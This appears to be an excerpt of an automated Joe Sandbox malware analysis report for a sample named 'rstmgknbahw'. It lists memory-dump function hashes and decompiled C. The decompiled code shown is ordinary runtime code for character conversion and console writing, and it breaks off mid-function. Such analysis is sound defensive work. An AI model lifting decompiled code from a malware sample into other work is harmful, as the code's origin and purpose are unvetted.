Uniqueness Score: -1.00%

Function 049E4190 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a64b1117d26d536af088b704051a9deb375eefbe09fbeaa4a71416e341ab1d
Instruction ID: ddfe0622c4139eb408a20c85185de0a719a92a29461ea7d4d77ddcddc4b93081
Opcode Fuzzy Hash: 48a64b1117d26d536af088b704051a9deb375eefbe09fbeaa4a71416e341ab1d
Instruction Fuzzy Hash: 39110631B002168BDB15EBF6D8046BF76BBAF95340F51493BD40797345EE75A80097A2

Uniqueness

Uniqueness Score: -1.00%

Function 049E4180 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9378db7ec5161cb1260848d91e21f3a1c68c3fcbdd8af16d3aecd0c43310587d
Instruction ID: 03299b10f523456804bc9b2eb9b2fba84e227168c9d45d5b6e5bbe0fb9d10e2e
Opcode Fuzzy Hash: 9378db7ec5161cb1260848d91e21f3a1c68c3fcbdd8af16d3aecd0c43310587d
Instruction Fuzzy Hash: 76012B3170C2A4DBCF1657B7A804CBA7B6BCAF625070049BBC41687101EA77E4069651

Uniqueness

Uniqueness Score: -1.00%

Function 00AB8244 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83479d5770338ea2d374352a51d27774649b667ef9d95dbc274e9cd80cd3f1a3
Instruction ID: b825d4f941680cee3b9f34dcd0621e36ed5dfc9d536c601b0fa3930ff2ea80fb
Opcode Fuzzy Hash: 83479d5770338ea2d374352a51d27774649b667ef9d95dbc274e9cd80cd3f1a3
Instruction Fuzzy Hash: C711B430204780DFD715CB58C940BA6BBA9EB89718F24C9ACE9490B647CB7FD803CA51

Uniqueness

Uniqueness Score: -1.00%

Function 049E11DF Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f41c560e62931a4837cc3facb65ac363ecb0c1b4b4bdccfbd6d0fc9d9f212c
Instruction ID: 65dc63d360c25c6c3805eee48c035858ecc3606a64d43ea95795c25e02ebdf9d
Opcode Fuzzy Hash: 24f41c560e62931a4837cc3facb65ac363ecb0c1b4b4bdccfbd6d0fc9d9f212c
Instruction Fuzzy Hash: 4B115A303092808FC7169B2988599797FE6AF8620071985FAE446CB3A7CA75AC099752

Uniqueness

Uniqueness Score: -1.00%

Function 049E05B9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6614eb15f3f64e6bed8b4e8e8ac1f3d55d7856521f305a56655163443dcbd44
Instruction ID: f5d3914da887aebf88697d8abbb8d0700d1a8594c00854dd544de40f4baae157
Opcode Fuzzy Hash: e6614eb15f3f64e6bed8b4e8e8ac1f3d55d7856521f305a56655163443dcbd44
Instruction Fuzzy Hash: 0901D1213001604BCB0A367D54222BE179B9BCAA58768446EE006EB396DD68AC0B53EA

Uniqueness

Uniqueness Score: -1.00%

Function 049E238F Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d7736ee3a51db5f9ed2d1fb8493030afb404ba5d892851bcfdb0a09af39103a
Instruction ID: 2acc43909a05538d5c3cae3797a5b5cd38d3ab61c294677d172ae20c87294892
Opcode Fuzzy Hash: 6d7736ee3a51db5f9ed2d1fb8493030afb404ba5d892851bcfdb0a09af39103a
Instruction Fuzzy Hash: 8D119E30A04249CFDB269F66C9507BE7BBABB44700F1048BAC502A6744EB316942DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00AB8223 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c141564f09033f91f390fa9c4d7ffb1320982d2747a21b97d04f9712ed0d6c
Instruction ID: 754e0f0938a1bb5577bebec5f0b9394340af177a07b28546df21e0897cdea1d9
Opcode Fuzzy Hash: 01c141564f09033f91f390fa9c4d7ffb1320982d2747a21b97d04f9712ed0d6c
Instruction Fuzzy Hash: 4C112B3514D7C08FC717CB14C990B55BFB5AB46318F288AEED9894B6A3C73A9806CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00AB0638 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e6452b6a278cb9998121899ebbc4541fd07c5cbe4044ec5f1244251b5ff67a
Instruction ID: e2ccb36ca6d8f02c82c7215b1d8ad36300551b430e20ca9f4c85b485af80db77
Opcode Fuzzy Hash: 87e6452b6a278cb9998121899ebbc4541fd07c5cbe4044ec5f1244251b5ff67a
Instruction Fuzzy Hash: 8DF0F93154C7809FC3158B15AC61992BFA8EF81330B1881EBD849CB613E53AE908CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00AB05D2 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07552edfddaec59e06a51c1bd0e2b882c618d17ce383f640be94d493c2869ed0
Instruction ID: 22b9574b125e5aaa5bebdd0a612b5f48667c8966907181b359869ffaf5d88ee0
Opcode Fuzzy Hash: 07552edfddaec59e06a51c1bd0e2b882c618d17ce383f640be94d493c2869ed0
Instruction Fuzzy Hash: F401D67550D7806FD7128B06DC40862FFA8EB86270708C49FEC49CB612D229A808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 049E05C8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66f914415bd62fcc11da5018ce96f0c8e8f9929aed1db6fa28431e23b459183d
Instruction ID: a86da9b59432d6c2cfe93a06d0f327fab017d16f3e6dd849c26d25cd44112712
Opcode Fuzzy Hash: 66f914415bd62fcc11da5018ce96f0c8e8f9929aed1db6fa28431e23b459183d
Instruction Fuzzy Hash: CCF0B4313005244BCB09767E941277F62CB9BC9A58764853EF106EB384DDB8AC0763DA

Uniqueness

Uniqueness Score: -1.00%

Function 049E1218 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18dbcbbfc935c15e07047d4e4559e839ba514e62d4161ab4bed24f5dabf4da6f
Instruction ID: 7c4a6bb3dbbed08bb1d244d8b53f7dfa242978df48b2b08f569abe166da16e37
Opcode Fuzzy Hash: 18dbcbbfc935c15e07047d4e4559e839ba514e62d4161ab4bed24f5dabf4da6f
Instruction Fuzzy Hash: 83016D30304110CFC604A72AD458979B7EBBFC5700B2044BAE406CB366DF75AC089782

Uniqueness

Uniqueness Score: -1.00%

Function 049E0918 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ddc56b443f61110a6cece989441f78ebb9d47699a47f92e44d31eeb6ea6b36c
Instruction ID: 84b8c852c9417896695badfc0b1077e3f82b0cc3cb608b43acaeeab0b4fd2a58
Opcode Fuzzy Hash: 1ddc56b443f61110a6cece989441f78ebb9d47699a47f92e44d31eeb6ea6b36c
Instruction Fuzzy Hash: 68E05532F242388B9B015EF799081BFBBEA9780250F0008338B0793200E9F0A80662D1

Uniqueness

Uniqueness Score: -1.00%

Function 049E3BC4 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c8b34fb35678e1fb60f90889e0e3934e4b0a967459bc42eed4f85b7be4048e
Instruction ID: 3e7cc4009da01febcf00ce876e7e5e9439b3371c09d0d465689233af896f6702
Opcode Fuzzy Hash: 60c8b34fb35678e1fb60f90889e0e3934e4b0a967459bc42eed4f85b7be4048e
Instruction Fuzzy Hash: 58F05E31B04518CFDB51EE9AE4846BCB773FBC0310B648666D81ADB249DF34AD418782

Uniqueness

Uniqueness Score: -1.00%

Function 049E0908 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98aa427736791220dc25ac0ef26420d988ea76a667d22f4e64fdc33c774cceab
Instruction ID: b3554dbf4bd6e045713b38d8cb90d099a4b3b644844ef6f0af736be36802cec8
Opcode Fuzzy Hash: 98aa427736791220dc25ac0ef26420d988ea76a667d22f4e64fdc33c774cceab
Instruction Fuzzy Hash: 50F02730B193648FD7024FB2495477F7FE75B42200B1609AB8E439B256E9B8EC06A261

Uniqueness

Uniqueness Score: -1.00%

Function 00AB8300 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction ID: b6478a4889dcca41684fb4e286bd10e981cf634a8187707cf4867667736b9b8c
Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction Fuzzy Hash: C6F0FB35144644DFC606CF44D540B65FBA6EB89718F24C6A9E9490B752C73BD813DA81

Uniqueness

Uniqueness Score: -1.00%

Function 00AB05F6 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf41980a7af441adeaa25c99d31e87cc7681d8f9cff14e80c94ec968d86b0d2
Instruction ID: 893d08fe10ac6cc491346c77bc9a2a06d8f84acc51ebc1c981c614fd9b2f0682
Opcode Fuzzy Hash: 3cf41980a7af441adeaa25c99d31e87cc7681d8f9cff14e80c94ec968d86b0d2
Instruction Fuzzy Hash: E1E092766447005BD650CF0AEC81452FBD4EB84630B18C07FDC0D8B700E63AF508CEA6

Uniqueness

Uniqueness Score: -1.00%

Function 049E2D20 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f04b65be02425b337a2264584ca8d9d68b171e2b65ec115eb534ae1da40c3a6
Instruction ID: 7ed1ab72bacaab4c6c15d7c263a755f92824f7116768894d6e3ccb0548a4a3b0
Opcode Fuzzy Hash: 8f04b65be02425b337a2264584ca8d9d68b171e2b65ec115eb534ae1da40c3a6
Instruction Fuzzy Hash: B3D05E3428C2C09ED307079619607B03F2ADB1B611F180EE79ACB490F3A004F057A222

Uniqueness

Uniqueness Score: -1.00%

Function 049E02A1 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966b02a6a926005ce475063e4ed15c8d5291622f07b2611463b3caebab8c75c0
Instruction ID: a5483ca7e0127fcf0da1b5702b4776c0d4bdb0fcde7ff03f3082f4daf06ec236
Opcode Fuzzy Hash: 966b02a6a926005ce475063e4ed15c8d5291622f07b2611463b3caebab8c75c0
Instruction Fuzzy Hash: 07E05B3434C740CFC352DB65A5E45D23BF1EE426103458D9AD4E647666C724FC0BD750

Uniqueness

Uniqueness Score: -1.00%

Function 049E064F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d397034200d54692503e7d18efb6e93baecdc31a3e3e6551cbf9823e3ce30f5
Instruction ID: c5b662af472d137560961333cbe28225ee7f2b642cdca709b3d13c39a89bbd14
Opcode Fuzzy Hash: 9d397034200d54692503e7d18efb6e93baecdc31a3e3e6551cbf9823e3ce30f5
Instruction Fuzzy Hash: EDD0A7B25492D0CFC29647B129191F47F72DE931047188DABD8405983195717653AA11

Uniqueness

Uniqueness Score: -1.00%

Function 049E016F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c12deef6cc759294ca3e836b009a79d4e7404e2614819b7752f8d2dc239b543
Instruction ID: fbb4ce5a29300282e844316783095b2a7e3ae44c4ca3ae8cc0e35d38c857c213
Opcode Fuzzy Hash: 5c12deef6cc759294ca3e836b009a79d4e7404e2614819b7752f8d2dc239b543
Instruction Fuzzy Hash: ECD05B32701300CFD7057770E52911C3B61EF8526674449BFD4268ABE0DE3AC495CA04

Uniqueness

Uniqueness Score: -1.00%

Function 00A823F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.734600924.0000000000A82000.00000040.00000001.sdmp, Offset: 00A82000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a82000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e44e742bbfeddb7f96924173d2b644d209f20612aba119046198be8ca327b01b
Instruction ID: 1ee307cf787418dce05ef33d0353b7f3cb8677eb4a86782512447d1166f3e595
Opcode Fuzzy Hash: e44e742bbfeddb7f96924173d2b644d209f20612aba119046198be8ca327b01b
Instruction Fuzzy Hash: 5AD05E79244A914FD3269B1CC1A4BA53BD4AB51B04F4684FAA8408B6A7C768DA81D310

Uniqueness

Uniqueness Score: -1.00%

Function 049E0180 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033a24ea93443da93e9e39c74cb8eb2982c1b0d7ecb9c86f5154a6a2c8879a07
Instruction ID: f1a55b635f19dfa3badcf1ffa9fadba85256cb151348503d16676917522ab044
Opcode Fuzzy Hash: 033a24ea93443da93e9e39c74cb8eb2982c1b0d7ecb9c86f5154a6a2c8879a07
Instruction Fuzzy Hash: 9DD01231311304CFCB09BBB0E41D41C37A5AF8824A740087DD80687B50EE3AE841CA04

Uniqueness

Uniqueness Score: -1.00%

Function 049E0660 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e655fae6281fc29c8821b82b10253d38b67b64a3040570ee2d6bfaecd3f8557c
Instruction ID: 7bc3ff2bd2ef8ad5d49c0cda661b55123d755c24b425c9fa218f1402ab409d1c
Opcode Fuzzy Hash: e655fae6281fc29c8821b82b10253d38b67b64a3040570ee2d6bfaecd3f8557c
Instruction Fuzzy Hash: B6C02B30249234CFC25597B22C0553D721A56C0708714CD36A401100309DB27452A821

Uniqueness

Uniqueness Score: -1.00%

Function 049E2EC0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a9683d8a07ae299487206a149b61e73b1227364d8a70a57d4879eb78410759
Instruction ID: d1813964e98be40abcfc0cf55ccec07907487f23a4745347fb09de7f4f99cc2f
Opcode Fuzzy Hash: b4a9683d8a07ae299487206a149b61e73b1227364d8a70a57d4879eb78410759
Instruction Fuzzy Hash: D2B012303043091B27809BF72C0CB23738C564040535400BA980CC4000F900E0902141

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004078CF Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0xc066fb75
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0xc066fb75
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
